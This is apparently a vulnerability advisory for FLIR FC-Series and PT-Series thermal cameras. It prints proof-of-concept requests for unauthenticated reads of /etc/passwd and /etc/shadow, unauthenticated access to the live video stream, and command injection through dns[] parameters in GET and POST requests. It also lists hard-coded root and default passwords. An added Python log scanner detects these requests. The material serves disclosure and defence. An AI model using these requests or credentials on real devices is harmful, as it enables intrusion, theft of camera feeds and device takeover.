SSD Advisory – FLIR Systems Multiple Vulnerabilities

Vulnerabilities Summary
The following advisory describes five vulnerabilities found in the FLIR Systems FLIR thermal/infrared cameras FC-Series S, FC-Series ID and PT-Series.
FLIR – “Best-in-class thermal cameras with on-board analytics for high-performance intrusion detection. The new FC-Series ID combines best-in-class thermal image detail and high-performance edge perimeter analytics together in a single device that delivers optimal intrusion detection in challenging environments and extreme conditions”.
The vulnerabilities found are:

  • Information disclosure
  • Stream disclosure
  • Unauthenticated Remote Code Execution
  • Authenticated Remote Code Execution
  • Hard-coded Credentials

Credit
An independent security researcher, Gjoko Krstic – Zero Science Lab, has reported these vulnerabilities to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor Response
The vendor was notified on the 27th of June 2017. Several emails were exchanged, but no ETA for a fix or workaround has been provided for the following vulnerabilities.

Vulnerabilities details
Information Disclosure (1)
The FLIR web server's webroot/js/fns.login.js exposes API functionality. Using the following API calls, an attacker can download and read files from the FLIR OS:

  • /api/xml?file=PATH-TO-FILE
  • /api/file/download/PATH-TO-FILE
  • /api/file/content/PATH-TO-FILE
  • /api/server/videosnap?file=PATH-TO-FILE
  • /page/maintenance/view/server-lan
  • /api/file/ini/read
  • /api/system/config/product

Proof of Concept

http://IP/api/xml?file=/etc/passwd
http://IP/api/xml?file=/etc/shadow
http://IP:8081/api/file/download/etc/shadow
http://IP:8081/api/file/download/etc/passwd
http://IP:8081/api/file/content/var/log/messages
http://IP:8081/api/server/videosnap?file=../../../../../../etc/passwd
http://IP:8081/page/maintenance/view/server-lan
http://IP/api/file/ini/read
http://IP:8081/api/system/config/product

Stream Disclosure
The FLIR web server does not verify that the user is authenticated before serving the live feed.
Proof of Concept
An attacker can obtain the live stream by sending either of the following requests:

http://IP:8081/graphics/livevideo/stream/stream3.jpg
http://IP/graphics/livevideo/stream/stream1.jpg

Unauthenticated Remote Code Execution
User-controlled input is not sufficiently sanitized and can be exploited by an attacker to execute commands on the device.
By sending a GET request to /maintenance/controllerFlirSystem.php an attacker can trigger the vulnerability; the PoC below places the command in the dns[dhcp] parameter, enclosed in backticks (URL-encoded as %60).
Proof of Concept

GET /maintenance/controllerFlirSystem.php?dns%5Bdhcp%5D=%60COMMAND-TO-EXECUTE%60&dns%5Bserver1%5D=1.2.3.4&dns%5Bserver2%5D=&_=1491052263282 HTTP/1.1

Authenticated Remote Code Execution
User-controlled input is not sufficiently sanitized and can be exploited by an authenticated attacker to execute commands on the device.
By sending a POST request to /page/maintenance/lanSettings/dns an attacker can trigger the vulnerability; the PoC below appends the command, enclosed in backticks (URL-encoded as %60), to the dns[server2] parameter.
Proof of Concept

POST /page/maintenance/lanSettings/dns HTTP/1.1
Host: TARGET:8081
Content-Length: 64
Accept: */*
Origin: http://TARGET:8081
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://TARGET:8081/maintenance
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
DNT: 1
Connection: close

dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60COMMAND-TO-EXECUTE%60
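As an added defensive example (not part of the advisory), the following Python script flags, in web-server access logs or captured requests, the two request patterns documented above: sensitive-file reads through the file-serving API calls from the Information Disclosure section, and shell metacharacters in the dns[] parameters of the two DNS settings handlers from both Remote Code Execution sections. The sample log lines are constructed and an Apache combined log format is assumed; the endpoint list and file names come from the PoCs on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoints named in the advisory: file-serving API calls and the DNS settings handlers.
FILE_ENDPOINTS = ("/api/xml", "/api/file/download/", "/api/file/content/",
                  "/api/server/videosnap")
DNS_ENDPOINTS = ("/maintenance/controllerFlirSystem.php",
                 "/page/maintenance/lanSettings/dns")
# Shell metacharacters that never belong in a DNS server address or DHCP flag.
SHELL_META = re.compile(r"[`$;|&<>(){}\n]")
# Traversal sequences and the system files the advisory's PoC requests.
SENSITIVE_FILE = re.compile(r"\.\./|/etc/(passwd|shadow)|/var/log/")

# Constructed access-log lines (Apache combined format assumed; not from a real device).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2017:10:00:01 +0000] "GET /graphics/livevideo/stream/stream1.jpg HTTP/1.1" 200 51200
10.0.0.7 - - [01/Jul/2017:10:00:02 +0000] "GET /api/xml?file=/etc/shadow HTTP/1.1" 200 812
10.0.0.7 - - [01/Jul/2017:10:00:03 +0000] "GET /api/server/videosnap?file=../../../../../../etc/passwd HTTP/1.1" 200 1204
10.0.0.9 - - [01/Jul/2017:10:00:04 +0000] "GET /maintenance/controllerFlirSystem.php?dns%5Bdhcp%5D=%60COMMAND-TO-EXECUTE%60&dns%5Bserver1%5D=1.2.3.4 HTTP/1.1" 200 44
10.0.0.3 - - [01/Jul/2017:10:00:05 +0000] "GET /maintenance/controllerFlirSystem.php?dns%5Bdhcp%5D=1&dns%5Bserver1%5D=8.8.8.8 HTTP/1.1" 200 44
"""

def classify(target, body=""):
    """Return findings for one request: the URL target plus an optional form body (POST)."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    params = parse_qs(parts.query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    findings = []
    if path.startswith(FILE_ENDPOINTS):
        # The file may be named in ?file= or appended to the path itself.
        if any(SENSITIVE_FILE.search(c) for c in params.get("file", []) + [path]):
            findings.append("sensitive-file-read")
    if path.startswith(DNS_ENDPOINTS):
        dns_values = [v for k, vs in params.items() if k.startswith("dns[") for v in vs]
        if any(SHELL_META.search(v) for v in dns_values):
            findings.append("dns-command-injection")
    return findings

def scan_log(log_text):
    """Return (client_ip, target, findings) for each suspicious line of an access log."""
    alerts = []
    for line in log_text.splitlines():
        m = re.search(r'^(\S+) .*"(?:GET|POST) (\S+) HTTP/', line)
        if m and (findings := classify(m.group(2))):
            alerts.append((m.group(1), m.group(2), findings))
    return alerts
```

POST bodies are not recorded in standard access logs, so classify() takes the form body as a second argument for use with proxy captures or request mirroring.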

Hard-coded Credentials

root:indigo
root:video
default:video
default:[blank]
ftp:video